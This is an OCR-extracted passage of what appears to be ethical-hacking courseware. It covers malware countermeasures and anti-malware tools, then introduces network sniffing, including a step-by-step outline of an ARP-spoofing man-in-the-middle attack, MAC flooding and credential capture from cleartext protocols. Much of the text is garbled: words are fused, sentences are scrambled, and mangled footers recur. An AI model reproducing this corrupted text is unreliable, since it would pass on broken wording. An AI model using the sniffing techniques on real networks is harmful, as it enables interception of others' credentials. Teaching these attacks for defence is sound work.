networkpackets usingprotocol tools
monitoring
is found to beinfectedbybackdoors,
If a computer restart the infectedcomputer
in the
safemodewith networking
Runregistry toolsto findmaliciousregistry
monitoring bythebackdoor
entries added
or uninstallthe programor application
Remove installedbythe backdoorTrojan
or virus
Remove entries addedbythebackdoorTrojan
the maliciousregistry
Deletemalicious
filesrelatedto the
backdoor Trojan
ical andCountermensores
Mackin ©by E-Comel
Copyright
Virus and WormCountermeasures
‘Virus
andWormCountermeasures
Somecountermeasuresagainst
viruses andworms are as follows:
‘+
Installantivirus softwarethat detectsandremoves infectionsas theyappear
=
for safecomputing
Generatean antivirus policy anddistribute
it to thestaff
=
Payattention to the instructions whiledownloading
filesor programsfromthe Internet
Regularlyupdate antivirus software
Avoidopening attachments receivedfromunknownsenders, as viruses spread
via e-
mailattachments
Sincevirus infections data,ensure that you perform
can corrupt regular
databackups
regular
Schedule scansfor all drivesafterthe installationof antivirus software
Do not accept without checking
disksor programs themfirst usinga current version of
an antivirus program
hasbeenapproved
Ensurethat anyexecutablecodeusedwithinthe organization
Donot bootthe machinewith an infectedbootablesystem
disk
Stay
informedaboutthe latestvirus threats
CheckDVDs
forvirus infection
Ensurethat pop-upblockersare turnedon andusean Internetfirewall
Performdiskclean-up
andrun a registry
scanner once a week
Runanti-spyware
or anti-adware
once a week
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Do
not
open
files onefile-type
with more than extension
=
Be
cautious
with
files
through
instant
sent
messenger
applications
Module
7 1062
Page tical andCountermensores
Making by Comet
Copyright©
FilelessMalwareCountermeasures
Plugdolonts
and
applicationscoderunningon yoursystems
Trainemployees to detect phishing
emailsand to never enablemacros i n MSOffice
documents
DisablePDFreadersto run JavaScript
automatically
DisableFlashin thebrowsersettings
Implement two-factorauthenticationto access criticalsystems
or resources connected
to thenetwork
Implement multi-layer to detectanddefend
security againstmemory-resident malware
UseUserBehaviorAnalytics
(UBA)
solutionsto detectthreatshiddenwithin your data
Ensurethe ability
to detectsystemtoolssuchas PowerShellandWMIC, andwhitelisted
application
scripts malicious
against attacks
Run periodicantivirus scans to detect infectionsand keepthe antivirus program
updated
ical andCountermensores
Mackin ©by E-Comel
Copyright
downloads
toolsanddisableautomatic plugin
Installbrowserprotection
regular
Schedule checksfor applications
security andregularly
patch
the applications
Regularly
update patches
the OSwiththe latestsecurity
Examineallthe runningprograms for anymaliciousor new signatures
andheuristics
Enableendpoint to protectnetworkswhenaccessed
securitywith active monitoring
remotely
Examinethe indicatorsof compromiseon the system
andthe network
Regularly
check logsespecially
the security whenexcessive amounts of dataleavethe
network
Restrictadmin rightsand provide
the least privileges
to the user level to prevent
privilege
escalation
attacks
Useapplication
controlto preventInternetbrowsersfrom spawningscriptinterpreters
suchas PowerShell
andWMIC.
Carefully
examine the changes
i n the system's
usualbehavior compared
patterns with
the baselines
antivirus (NGAV)
Usenext-generation softwarethat employsadvancedtechnology
such
aSML (machinelearning) intelligence)
and Al (artificial to avoid new polymorphic
malware
Use baselineandsearchfor knowntactics,techniques,
and procedures
(T7Ps)
usedby
manyadversarial groups
Ensurethat you use Managed
Detectionand Response
(MDR)
services that can perform
threathunting.
Ensurethat youuse
Experience toolssuchas Blackberry
Toolkitto combatfilelessattacks
andMicrosoft
Cylance Mitigation
Enhanced
applications
Disableunusedor unnecessary andservice features
Uninstallapplications
thatare not important
Blockallthe incomingnetworktrafficor fileswith the .exeformat,
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
MalwareConcepts FilolossMalwareConcepts
MalwareAnalysis
‘Trojan
Concepts Countermeasures
Virus and
Worm
Concepts Anti-MalwareSoftware
Anti-Malware Software
An attackeruses malwareto commit onlinefraudor theft.Thus, the use of anti-malware
softwareis recommended to helpdetectmalware, remove it, and repair any damage it might
cause.Thissection listsanddescribes
various anti-malware(anti-Trojanandantivirus)software
programs.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Software
Anti-Trojan
Kaspersky
Internet Security
Kaspersky
internet
Secu
proves
agaist protection Tolan
Malwarebytes
(tp/mrnmlwaeytes or)
Pubs
AnMawar teams.)
Software
Anti-Trojan
Anti-Trojan
softwareis a tool or program that is designed to identifyand preventmalicious
or malware
Trojans frominfecting computer systems or electronic tools
devices.Anti-Trojan
mayemploy scanningstrategiesaswell as freewareor licensed rootkits,
toolsto detectTrojans,
andothertypesof potentially
backdoors, damaging software.
Kaspersky
Internet
Security
Source:https://www.kaspersky.com
Kaspersky Internet Security protectsdevicesfrom various typesof intrusions due to
Trojans,viruses, spyware,ransomware, phishing, and dangerous websites. It securely
stores passwords for easy access on PC,Mac,and mobile.It makesbackup copies of
photos, music, andfilesand alsoencrypts data on PC. Furthermore, it automatically
blocksinappropriate content and helps you managethe use of socialnetworks.In
addition,
extra
when
you
shop
bank
it provides security
online or on PCor Mac.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Yourprotection
is live now
v .
Ostaoe Update
Pvc Protection
EyParental Cont
My ys
tspenky terse 28 remain
Figure7219:
Serenshotof Kaspersky
InternetSecurity
Someadditionalanti-Trojan
softwareare as follows:
=
McAfee® (https://www.mcafee.com)
LiveSafeâ„¢
‘=
Symantec Premium(https://www.symantec-norton.com)
NortonSecurity
=
(https://bitdefender.com)
BitdefenderTotalSecurity
HitmanPro(https://www.hitmanpro.com)
Malwarebytes (https://www.malwarebytes.org)
ZemanaAntimalware (https://www.zemana.com)
Emsisoft Home(https://www.emsisoft.com)
Anti-Malware
Tool(https://www.microsoft.com)
MaliciousSoftwareRemoval
SUPERAntiSpyware
(https://www.superantispyware.com)
Plumbytes
Anti-Malware(httpsi//plumbytes.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Antivirus Software
Antiviras
‘Bitdefender
Plas
2019
You are safe
Norton
us Pre
Bi
Antivirus
neu
tmnt
tines
com)
com)
Pad Atv
Pro te//n pede om
Antivirus Software
It is essentialto update antivirus toolsto monitor the datapassingthrough Suchtools
a system.
mayfollowspecific or genericmethods to detectviruses. Genericmethods lookforvirus-like
performance ratherthana specific virus. Thesetoolsdo not specify the virus typebut warn the
user of a possible virus infection. Genericmethodscan raise falsealarms; hence,theydo not
perform well i n terms of detecting precisevirus forms.Specificmethodslook for knownvirus
signatures i n the antivirus databaseand askthe user to choosethe necessary action to be
good
It is a practice
and
taken,suchas repair delete.
for organizations
of
to installthe mostrecent version the antivirus software
andregularly update it to keep
up withthe introductionof new viruses i n themarket.Updating
of antivirus softwarebythe respectivevendorsis a continuous process.
+
BitdefenderAntivirusPlus2019
Source:https://www.bitdefender.com
Bitdefender fromviruses, worms, and
AntivirusPlus2019works againstall threats,
Trojans
to ransomware, zero-dayexploits,
rootkits, and spyware. It uses a technique
calledbehavioral detection to closely monitor active apps.As soon as it detects
suspiciousactivity,i t takesdecisiveaction to preventinfection.It sniffsand blocks
maliciouswebsitesthatmasquerade astrustworthy websitesto stealfinancial
datasuch
as passwords
or creditcardnumbers.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Youare safe
v
A wesenansryntonmenonron 2
figure7.120;Screens
Someadditionalantivirus softwareare as
of
Bitdefender
follows:
Anus Plus
2 19
+
(http://mww.clamwin.com)
ClamWin
=
Anti-Virus(https://www.kaspersky.com)
Kaspersky
+
McAfeeAntiVirus
Plus
(https://home.mcafee.com)
Norton AntiVirusBasic(https://www.norton.com)
Avast Premier Antivirus (https://www.avast.com)
(https://www.eset.com)
InternetSecurity
ESET
(https://free.avg.com)
AVGAntivirusFREE
AviraAntivirusPro(https://www.avira.com)
(https://trendmicro.com)
TrendMicroMaximumSecurity
PandaAntivirus Pro (https://www.pandasecurity.com)
WebrootSecureAnywhere
Antivirus(https://www,webroot.com)
Modal
7
Page
tical
Making
and by CountermensoresCopyright©
Comet
FilelessMalwareDetectionTools
‘Ailenvasito
snout
sm
espoee€08).
i
|| | @
Fileless Malware DetectionTools
cme
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
7.121:
Screenshot
ofAllenVault*
USMAnythereâ„¢
Someadditionaltoolsfor detecting
filelessmalwarethreatsare as follows:
(http://www.quickheal.com)
QuickHealTotalSecurity
DetectionandResponse
Endpoint (EDR)
(https://www.
trendmicro.com)
+
DefenderCheck(https://github.com)
FCL(https://oithub.com)
CYNET360 (https://www.cynet.com)
Modal
7
Page
tical
Making
and by CountermensoresCopyright©
Comet
FilelessMalwareProtectionTools
(8 Mss En
Point
Sect i a security tool wed sect profesional
ical andCountermensores
Mackin ©by E-Comel
Copyright
figure
7422SrenshotofMcAfeeEndoi ecrty
Someadditionalfilelessmalwareprotectiontoolsare as follows
+
MicrosoftDefenderAdvancedThreatProtection (https://docs.microsoft.com)
=
Kaspersky
EndPointSecurity (https://www.kaspersky.com)
forBusiness
=
TrendMicroSmartProtectionSuites(https://www.trendmicro.com)
Norton360with LifeLockSelect(https://us.norton.com)
REVEAntivirus (https://www.reveantivirus.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Summary
inthis module,
>
>
the
we dcussed fllowing
conceptsof malware
andmalware propagation
conceptsofAPTandi cycle
techniques
Inthe
next
wecus attackers,
adhe, wil in deta how aweasel hackers
Module Summary
This modulepresented
the conceptsof malwareand their propagation techniques.
It also
discussed
the concepts Furthermore,
of APTand its lifecycle. it describedthe concepts of
Trojans, theirtypes,andhowtheyinfectsystems. In addition,it described
the conceptsof
viruses, their types,and how theyinfect files as well as the conceptsof computerworms.
it explained
Moreover, of filelessmalwareandhow theyinfectfiles.It also
the concepts
illustrated how to perform static and dynamic malwareanalysis and describedvarious
techniques to detectmalware. Furthermore, it presented
various measures against Trojans,
backdoors, viruses, and worms. Finally, it endedwith a detaileddiscussion o n various anti-
Trojan andantivirus tools.
In the next module, we will discuss i n detail how attackers
as well as ethical
hackers andpen:
testers use sniffing
to collectinformationabouta targetof evaluation.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module08:
STaliiiinre}
Module Objectives
Understanding
How to Defendesis VariousSiig Teeniaues
fern
Understanding SitingCounten
ferent Techniques
Understanding andToolsto Detet Siig
Module Objectives
Thismodulestarts with an overview of sniffing an insight
and provides
concepts into MAC,
DHCP, ARP,MAC spoofing, andDNSpoisoningattacks.Later,the modulediscusses
various
sniffing
tools,
countermeasures, anddetectiontechniques.
+
willto:
Attheendof this module,
Describe
sniffing
you beable
concepts
+
+
MAC
Explain
different
DHCP
Explain
different
attacks
attacks
ARP
Describepoisoning
Explain spoofing
different attacks
Describe
DNSpoisoning
Apply
a defensemechanism various sniffing
against techniques
Use
different
sniffing
Apply tools
various
sniffing countermeasures
Apply
various techniques sniffing
to detect attacks
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
stn me
3 oo
2 oo
2 oo
Sonn
SniffingConcepts
Thissection describes networksniffing
and threats,howa snifferworks,active andpassive
sniffing,
how an attackerhacksa network using sniffers, protocolsvulnerableto sniffing,
sniffing
in the data link layer
of the OpenSystems Interconnection(OSI)model,hardware
protocolanalyzers,
SwitchedPortAnalyzer(SPAN) andlawfulinterception,
ports,wiretapping,
ical andCountermensores
Mackin ©by E-Comel
Copyright
NetworkSniffing
Packet Sniffing Howa SnifferWorks
network
using
«capturing passing a given
a software appliaton
or hardware transmitted
on is segment
deve
Ieallowsan attackerto observea ndaccess the
tentirenetwork
attackeree
trafficram a givenpoint
Packetsifingallows to gather
as
an
traffic, chat22
information
sensitive such Telnetpasswords, os
email syslogtafe, router configuration,
web
trafic ONStfc
account oa"
Sessions, and
FTPpasswords,
information
mene
Network Sniffing
Packetsniffing is the processof monitoring and capturingall data packets passingthrougha
given network usinga softwareapplication or hardwaredevice.Sniffing is straightforward
in
hub-basednetworks, as the traffic on a segment passesthrough all the hostsassociatedwith
that segment. However,most networkstoday work on switches.A switchis an advanced
computer networking device.The majordifferencebetweena huband a switchis that a hub
transmits line data to eachporton the machineand hasn o line mapping,whereasa switch
looksat the MediaAccess Control(MAC) with eachframepassing
addressassociated throughit
andsendsthe data to the required port. AMACaddressis a hardwareaddressthat uniquely
identifieseachnodeof network.
attackerneedsto manipulate
‘An
a the functionality
of the switchto see all the traffic passing
through it. A packet sniffingprogram(also knownas a sniffer)can capture data packets only
fromwithin a given subnet, whichmeans that it cannot sniff packets from anothernetwork.
Often,any laptop can plug into a networkandgainaccess to it. Manyenterprises’ switchports
are open.A packet snifferplaced on a networkin promiscuous modecan therefore capture and
analyzeall the networktraffic. Sniffing programs turn off the filter employed by Ethernet
networkinterface cards(NICs) to preventthe hostmachinefromseeingotherstations’ traffic.
Thus,sniffing programs can monitor all traffic.
Although
most networkstoday
employ
switchtechnology,
packet
sniffing
is still useful.Thisis
becauseinstallingremote sniffing programso n networkcomponents with heavy
trafficflows
suchas servers and routers is relatively
easy.It allowsa n attackerto observeand access the
entire network trafficfromone point.Packet snifferscan capturedata packets containing
sensitive information such as passwords, account information, syslogtraffic,router
configuration,DNStraffic,emailtraffic,web traffic,chat sessions,andFTPpasswords. This
Modul
8 1079
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
allowsan attackerto read passwords i n cleartext,
the actualemails, creditcard numbers,
financialtransactions, etc. It alsoallowsan attackerto sniff SMTP, POP, IMAP traffic,IMAP,
HTTPBasic, telnet authentication, SQLdatabase, SMB,NFS, andFTPtraffic. An attackercan gain
a substantialamount of informationbyreading captureddata packets; then,the attackercan
use thatinformation to break into the network.An attacker carries out more effectiveattacks
bycombining thesetechniques with active transmission,
following
‘The diagram an attackersniffing
depicts the data packets
betweentwo legitimate
networkusers:
Switch
aa Copyof datapassing
hrough
the switch
Figure
8.1:Packtsnifing
scenario
How a SnifferWorks
The most common way of networking computers is through a n Ethernet connection. A
computer connectedto a localarea network(LAN) hastwo addresses: a MAC address and an
InternetProtocol(IP)address.AMACaddressuniquely identifieseachnodein a networkandis
storedon the NIC itself.TheEthernetprotocol
uses the MAC address to transferdatato and
froma system whilebuilding dataframes.
Thedata linklayerofthe OSImodelu sesan Ethernet
headerwith the MAC addressof the destinationmachineinsteadof the IP address.The
networklayeris responsible formappingIPnetworkaddresses to the MACaddress a s required
bythe datalink protocol. It initially
looksfor the MACaddressof the destinationmachinei n a
table,
address,usually
calledthe AddressResolution
an ARPbroadcastof a request
network.Themachine
Protocol
packet
with that particular
(ARP) cache.If thereis no entryforthe IP
goes out to all machines
addressresponds
o n the localsub-
to the source machine with its
MACaddress.
machine,
Thesource machine's ARPcacheaddsthis MAC
i n all its communicationswiththe destinationmachine, address
to the table.Thesource
then uses this MACaddress.
work differently
Thereare two basictypesof Ethernetenvironments,andsniffers i n each.
Thesetwo
Shared
types
are:
Ethernet
Ina shared
Ethernet environment,a singlebusconnectsall thehoststhat compete for
bandwidth.In this environment, receive packets
all the other machines meant for one
machine.
Thus, 2,it sendsa packet
whenmachine1 wants to talk to machine out on the
Modul
8
Page1090 ical andCountermensores
Mackin
©
Copyright
by E-Comel
networkwiththedestinationMACaddress ofmachine2,along with its own source MAC
address.Theother machinesi n the sharedEthernet(machines 3 and 4)compare the
frame'sdestination
MAC address with theirown anddiscard the unmatched frame.
However,a machinerunning a sniffer ignores this rule and accepts all the frames.
Sniffing
in a shared
Ethernet and,hence,
environment is passive difficultto detect.
=
SwitchedEthernet
In a switchedEthernetenvironment, the hostsconnect with a switchinsteadof a hub.
Theswitchmaintains a tablethattrackseachcomputer's MACaddress andthe physical
porton whichthat MACaddressi s connected, andthendeliverspackets destinedfor a
particularmachine.Theswitchis a devicethat sendspackets to the destinedcomputer
only;furthermore, it doesnot broadcast themto all the computerson the network.This
resultsin better utilizationof the availablebandwidthand improved Hence,
security.
the processof puttinga machine NICinto promiscuous modeto gather packetsdoesnot
a
sniffing.
many people
work.As result,
However,
thinkthat switchednetworksare
thisis not true,
secure and immune to
Although
a switchis more secure than a hub,sniffing
the network is possible
usingthe
following
methods:
=
ARPSpoofing
ARPjs stateless.A machinecan send an ARP replyeven without asking for it;
furthermore, sucha reply.
it can accept Whena machinewants to sniff the traffic
fromanothersystem,
originating it can ARPspoofthegateway ofthe network.TheARP
cacheof the target machinewill havean incorrect entryfor the gateway.Thus,all the
trafficdestinedto passthrough the gateway will now passthrough the machinethat
spoofed the gateway MACaddress.
=
MAC Flooding
‘Switches
maintain a translation
table that mapsvarious MACaddresses to the physical
portso n the switch.As a result,
theycan intelligentlyroute packets
from one host to
another.However, switcheshavea limitedmemory.MACflooding makesu se of this
limitation to bombardswitcheswith fake MACaddresses until the switchescan no
longer keepup. Oncethis happens to a switch,it will enter fail-openmode, whereinit
starts actingas a hub bybroadcasting packetsto all the portson the switch.Oncethat
happens, it becomes easyto perform sniffing.
macofis a utility that comes with the
dsniffsuite andhelps theattackerto perform MACflooding,
Oncea switchturns into a hub, it starts broadcastingall packets it receives to all the computers
in the network.Bydefault, promiscuous modeis turnedoffi n networkmachines; therefore,the
NICsaccept onlythosepackets that are addressed machineanddiscardthe packets
to a user’s
sent to theothermachines. A sniffer turnsthe NICof a system to promiscuousmodeso that it
listensto all the data transmittedon its segment. A sniffer can constantly monitor all the
networktrafficto a computer
datapackets,
through
Attackersconfigure the NICin their machines the
the NIC bydecodinginformationencapsulated
to run in promiscuous
i n the
modeso that
ical andCountermensores
Mackin ©by E-Comel
Copyright
the cardstarts acceptingall the packets. the attacker
Thus, that are
can view all the packets
beingtransmittedin the network
AttackerPC
runningNICCardi n
PromiscuousMode
wx
Attacker
forcesA
‘itchto behave
Internet
8.2: Working
Figure ofasifer
ical andCountermensores
Mackin ©by E-Comel
Copyright
of Sniffing
Types
PassiveSniffing Ketive Sniffing
Packets
(ARP
theflood
Activesifingvoles Icing Address
Resolution
into network thesth
data
Servinga nyaddtionalpackesin network
the ContentAddressable
Memory 3b whch esos
(CAM)
Active Sniffing
Techniques
ARPPoisoning Attack
Spoofing
of Sniffing
‘Types
Attackersrun sniffersto convert the host system’s
NICto promiscuous mode.As discussed
the NIC in promiscuous
earlier, mode can then capturepacketsaddressedto the specific
network.
Thereare two typesof sniffing.
Eachis usedfor differenttypesof networks.Thetwo typesare:
Passive
+
sniffing
Activesniffing
Sniffing
Passive
Passivesniffing
involvessending
no packets.
It simply and monitors the packets
captures
flowing A packet
i n thenetwork. snifferaloneis not preferred
foran attackbecause
it works
onlyin a commen collisiondomain.A common collisiondomainis the sector of the network
that is not switchedor bridged (i.e.,
connectedthrough a hub). Common collisiondomainsare
presenti n hub environments. A networkthat uses hubs to connect systemsu ses passive
sniffing. In suchnetworks, all hostsi n the networkcan see all the traffic. Hence,
it is easyto
capture trafficthroughthe hubusingpassivesniffing,
Attacker Hub
8.3:Passive
Figure siting
ical andCountermensores
Mackin ©by E-Comel
Copyright
use the following
Attackers passivesniffing
methods
to gaincontrolover a targetnetwork:
=
Compromising physical security:
An attackerwho succeedsi n compromisingthe
physical of a targetorganization
security with a laptop
can walk into the organization
and try to pluginto the network and capturesensitive informationabout the
organization.
Using
a Trojan havein-builtsniffing
horse:Most Trojans capability.
An attackercan
installtheseon a victim'smachineto compromise it. After compromising
the victim's
theattacker
machine, snifferandperform
can installa packet sniffing,
Most modernnetworksuse switchesinsteadof hubs.A switcheliminates
the riskof passive
sniffing.
However, to active sniffing.
a switchis stillvulnerable
Note: Passivesniffing
provides
significant
stealthadvantages
over active sniffing.
ActiveSniffing
Activesniffingsearchesfor trafficon a switchedLANbyactively injectingtrafficinto it. Active
sniffingalsorefersto sniffingthrough a switch.In active sniffing,the switchedEthernetdoes
not transmit informationto all the systems connectedthrough LANas it doesin a hub-based
network.For this reason, a passive snifferis unableto sniff data o n a switchednetwork.It is
easyto detectthesesniffer programsandhighly difficultto performthistypeofsniffing,
Switches examine datapackets forsource anddestinationaddresses andthen transmit themto
the appropriate destinations. Therefore, it is cumbersometo sniffswitches.
However, attackers
can actively injectARPtraffic into a LANto sniffarounda switchednetworkand capturethe
traffic,Switches m aintain their own ARPcachei n Content Addressable Memory (CAM). CAM is
a special typeof memorythat maintains a recordof whichhostis connectedto whichport.A
snifferrecordsall the informationvisibleon the networkfor future review. An attackercan see
allthe information in the packets, including datathat shouldremain hidden.
To summarize the typesof sniffing:
passivesniffing
doesnot sendanypackets;
it onlymonitors
the packetssent byothers.Active sniffinginvolvessendingout multiple
network probes to
The
access
identify
points.
following
of
different
is
sniffing
techniques:
alist active
+
+
MAC flooding
DNSpoisoning
+
+
poisoning
ARP
DHCP
attacks
Switchportstealing
Spoofing attack
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
oS
Sost ot
ar a
Figure
8.4:a switch
Discovering t o access thenetwork
Modul
8 1085
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
the networktopology,
Step3: Byanalyzing the attacker
identifies
thevictim’s
machine
to targethis/her
attacks
So 3 72 a
St of af
86:
Figure Mentivngthevet's machine
@targetmachineuses ARPspoofing
Step4: An attackerwho identifies techniques
to
sendfake(spoofed)AddressResolutionProtocol(ARP)
messages.
Su. Mitt
cnn
BY
Attacker sendingfakeARPmessage
Figure8:7;
Step5: The previousstephelpstheattackerto divertall thetrafficfromthe victim's
‘computer Thisis a typical
to the attacker'scomputer. man-in-the-middle (MITM)typeof
attack
Step6:
88:the
Now,the attackercan
traficto
the
attacker
Figure Relracting
packets
see all the data sent andreceivedbythe victim,
Theattackerc an now extract sensitive informationfromthe packets,
suchas passwords,
usernames,creditcarddetails, andPINs.
ae
sensitive information
Figure89:Attackerextracting
a
ical andCountermensores
Mackin ©by E-Comel
Copyright
ProtocolsVulnerable to Sniffing
‘Telnet
and
Rlogin
Keystrokes
ining
andpasswords
tet
usernames
are sentin ear
|G:Passwords
and
data
are
sent
in
(©Dataissentin
deartont Passwords
anddataare sent in
sloartont
ProtocolsVulnerableto Sniffing
Thefollowing
protocols
are vulnerableto sniffing.
Themain reason for sniffing
theseprotocols
is to acquire passwords.
TelnetandRlogin
Telnet is a protocolusedfor communicating with a remote host (viaport 23)on a
networkusinga command-line
machineremotely
therefore,
via a TCP
datatraveling
terminal.rlogin
connection. Neitheroftheseprotocols
betweenclientsconnectedthrough
to
enablesan attacker loginto a network
providesencryption;
any of theseprotocols
are
in plaintext and vulnerableto sniffing. Attackers can sniff keystrokes, including
usernames andpasswords.
HTTP
Due to vulnerabilitiesin the defaultversion of HTTP,websitesimplementing HTTP
transferuser dataacross the networki n plaintext,
whichattackerscan readto stealuser
credentials.
SNMP
Simple
Network Management is a TCP/IP-based
Protocol(SNMP) protocol
usedfor
exchanging managementinformationbetweendevicesconnectedon a network.The
first version of SNMP(SNMPvi) does not offerstrongsecurity,
which leadsto the
transferof datai n a cleartextformat.Attackersexploit
the vulnerabilitiesi n this version
to acquirepasswords in plaintext.
ical andCountermensores
Mackin ©by E-Comel
Copyright
SMTP
Simple Mail TransferProtocol(SMTP) is usedfor transmittingemailmessages over the
Internet. In most implementations,
SMTPmessages are transmittedi n cleartext,
which
enablesattackers plaintext
to capture passwords. Further,SMTPdoesnot provide any
protection sniffing
against attacks.
NNTP
Protocol(NNTP)
NetworkNewsTransfer distributes, andposts
inquiresinto, retrieves,
news articlesusinga reliablestream-based
transmission of news amongthe ARPA.
Internet community. However,this protocolfailsto encryptthe data,whichallows
attackersto
PoP
sniff
sensitive information.
ap
Internet Message AccessProtocol(IMAP) allowsa client to access and manipulate
electronicmail messages on a server. Thisprotocol offers inadequatesecurity,which
allowsattackersto obtaindataanduser credentialsi n cleartext,
ical andCountermensores
Mackin ©by E-Comel
Copyright
in the DataLink Layer
Sniffing of the OSIModel
|& snitlers
operateatthedatalinkayeroftheOSImode!
|G. Networking inthe OS!m odeare designed
layers to workindependently
ofeachother i a sifer sits data
the ofthe
sniffing
Inthedatalinkayer, upperOS!layers willnot beaware
Presentation Presentation
Tansport ‘Transport
Inti
DataUnk
compromise
Dataunk
Prysicl Physical
Thedatalinklayer
aboveandreceives
is thesecond layer
services
fromthe layer below.
ofthe OS!model.In thislayer, datapackets
are encoded
at the datalink layer
anddecodedinto bits.Sniffersoperate packets
andcan capture fromthis
layer.
Networking layers in the OSImodela re designed to workindependently
ofeachother;
thus,if a sniffersniffsdata i n the datalink layer,
the upper OS!layers
will not be aware of the
sniffing,
Application plication
Presentation Presentation
Session Protocot/Poms
Session
Transport
Figure8.20:
inthe
Sniffing dat layer
link oftheOS made!
ical andCountermensores
Mackin ©by E-Comel
Copyright
HardwareProtocolAnalyzers
©
ttc dt
les
pact decodeit andanaests conten basedon certain predetermined
@ sown sce
nd tt ch aca pie hohe al e
HardwareProtocolAnalyzers
hardwareprotocol
‘A analyzeris a devicethat interprets traffic passingover a network.It
captures signalswithout alteringthe traffic segment.
Its purposeis to monitor networkusage
andidentify maliciousnetworktrafficgenerated byhacking softwareinstalledon the network.
It captures a data packet,decodesit, and analyzes its content according to predetermined
rules.It allowsan attackerto see the individualdata bytes of eachpacket passingthroughthe
network.
Compared analyzers,
to softwareprotocol hardwareprotocol
analyzers of
are capable
m ore data without packet
capturing drops at the time of dataoverload.Hardwareprotocol
analyzers
providea wide rangeof networkconnection options varyingfrom LAN,WAN,and
wirelessto circuit-based telconetworklines.They are capable
of displayingbusstatesandlow-
level events such as high-speed negotiation(K/Jchirps), transmission errors, and
retransmissions,The analyzers provideaccurate timestamps of the captured traffic. However,
hardwareanalyzers are more expensive andtend to be out of reachfor individualdevelopers,
hobbyists,andordinary hackers
Hardwareprotocol
analyzers
fromdifferentmanufacturers
include:
=
Voyager Max ProtocolAnalyzer
Source:https://teledynelecray.com
TheVoyager Max analyzer
platform accurate andreliable
provides of USB4and
capture
Thunderbolt3 protocols for fastdebugging,
analysis,
andproblem-solving.
Voyager M4x
featuresthe highest-fidelity probedesign reliability
andprovidesunmatched when
testingdevicesat thefull USB4Gen3x2(40Gb/saggregate)
speed,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure Mx Protocol
8.1: Voyager Analyzer
2X NSS40AAgilent
ProtocolAnalyzer
Source:https://www.valuetronics.com
The Agilent and deployment
N2X is a test solutionfor testingthe development of
network services for convergingnetworkinfrastructures.Serviceproviders,
network
(NEMs},
equipmentmanufacturers andcomponent can verify
manufacturers service
attributes of entire networksend-to-end, while also isolating problems down to
individualnetworking devicesandsubsystems. Two differenttypesof cardscan be
configured simultaneously,allowing
for test scenarios that use a combinationof port
types.
Figure8.12:
N2XNSSAOA Agilent Analyzer
Protocol
Someexamples
of hardwareprotocolanalyzers
are listedbelow:
+
Keysight (https://www.keysight.com)
£29608
=
Analyzer
STINGAProtocol (https://utelsystems.com)
+
NETSCOUTOneTouchATNetworkAssistant(https://enterprise.netscout.com)
NETSCOUTOptiView Tablet(https://enterprise.netscout.com)
XGNetworkAnalysis
Agilent
(Keysight)
Technologies (https://www.microlease.com)
8753ES
ical andCountermensores
Mackin ©by E-Comel
Copyright
SPANPort
"©ASPANport
isa por thats configured
lofeverypacket
thatpasses through »
to receive copy
aswiteh
SPANPort
SwitchedPort Analyzer (SPAN) is a Ciscoswitchfeature,alsoknownas “port mirroring,―
that
monitors networktraffic on one or more ports on the switch.A SPANportis a portthat is
configured to receive a copyof everypacket that passesthrough a switch.It helpsto analyze
and debug data,identify errors, and investigate unauthorizednetwork access. Whenport
mirroringis on, the networkswitchsendsa copyof the networkpackets fromthe source port
to the destinationport,whichstudiesthe networkpackets with the helpof a networkanalyzer.
Therecan beone or more sources,but thereshouldbe onlyone destination porton theswitch.
Sourceportsare the portsfor whichnetworkpackets are monitoredandmirrored.Theuser can
simultaneously monitor thetrafficof multiple ports,suchas thetrafficon all the portsof a
specificvirtuallocalarea network(VLAN).
erates
ale.
Figure8.13: ofSPAN
Working
ical andCountermensores
Mackin ©by E-Comel
Copyright
Wiretapping
mentoring
and
Internet
ivetapingistheprocesofthe f telephone conversations
by a thd party
two
phones
information
between
Wallowa attaches
orhoss ontheInemet
to monitor,intercept,
acces and recordinformation
c ontained
i na datalw in
‘otive
WiretappingPassive
Wiretapping
ommunication and
cords,
ates,
and records
the
1: temontors, © only monitors
als dataint the
injects tee and collects
knowledee
or rahe ‘Types
of
regarding
thedataRcontans
‘ering
Wiretapping
wy ~G
Wiretapping
Wiretapping, or telephone tapping,refers to the monitoringof telephone or Internet
conversations bya third partywith covert intentions. To perform the attackerfirst
wiretapping,
selectsa targetpersonor hoston the networkto wiretapandthen connects listening
(hardware, software,
two targetphones
or a combination
or hosts.Typically,
of both)
device
to the circuit carryinginformationbetweenthe
theattackerusesa smallamount of the electricalsignals
a
generated bythe telephone wires to tap the conversation. Thisallowsattackersto monitor,
access,and record information
Intercept, containedin the data flow i n a communication
system.
tapping
Methods
The
following
+
ways
perform
are
of lines
to wiretapping
Theofficialtappingtelephone
*
of telephone
Theunofficialtapping lines
+
theRecordingconversation
Direct linewiretap
Radiowiretap
ical andCountermensores
Mackin ©by E-Comel
Copyright
of Wiretapping.
Types
Thereare two typesof wiretapping that an attackerc an use to monitor,record,
andeven alter
the data flow i n the communication system.
=
ActiveWiretapping
In hackingterminology, is an MITM attack.Thisallowsan attackerto
active wiretapping
monitor andrecordthetrafficor dataflow i n a communication system.Theattackerc an
alsoalteror injectdatainto communicationor traffic.
Wiretapping
Passive
Passive
wiretapping is snoopingor eavesdropping.
Thisallowsan attackerto monitor
andrecordtraffic.Byobservingtherecorded
trafficflow,theattackercan snoopfora
password
or otherinformation.
Note: Wiretapping
isa criminaloffense or
without a warrant the consent of the people
andis punishable
i n most countries,
conducting
depending
the conversation
on the country's
law.
ical andCountermensores
Mackin ©by E-Comel
Copyright
LawfulInterception
©Lawl inerceptionrefersto lepllyintercepting
‘he
traditional
elecommunications,
datacommunication
Voleeove internetProtocol two
between endpons fr surveillance
dt, sndmultiservice networks
(ValP),
on
A
an
‘Lawful Interception
Lawful interception (LI)refers to legallyintercepting
data communication between two
endpoints for surveillanceon traditional telecommunications, VoIP,data,and multiservice
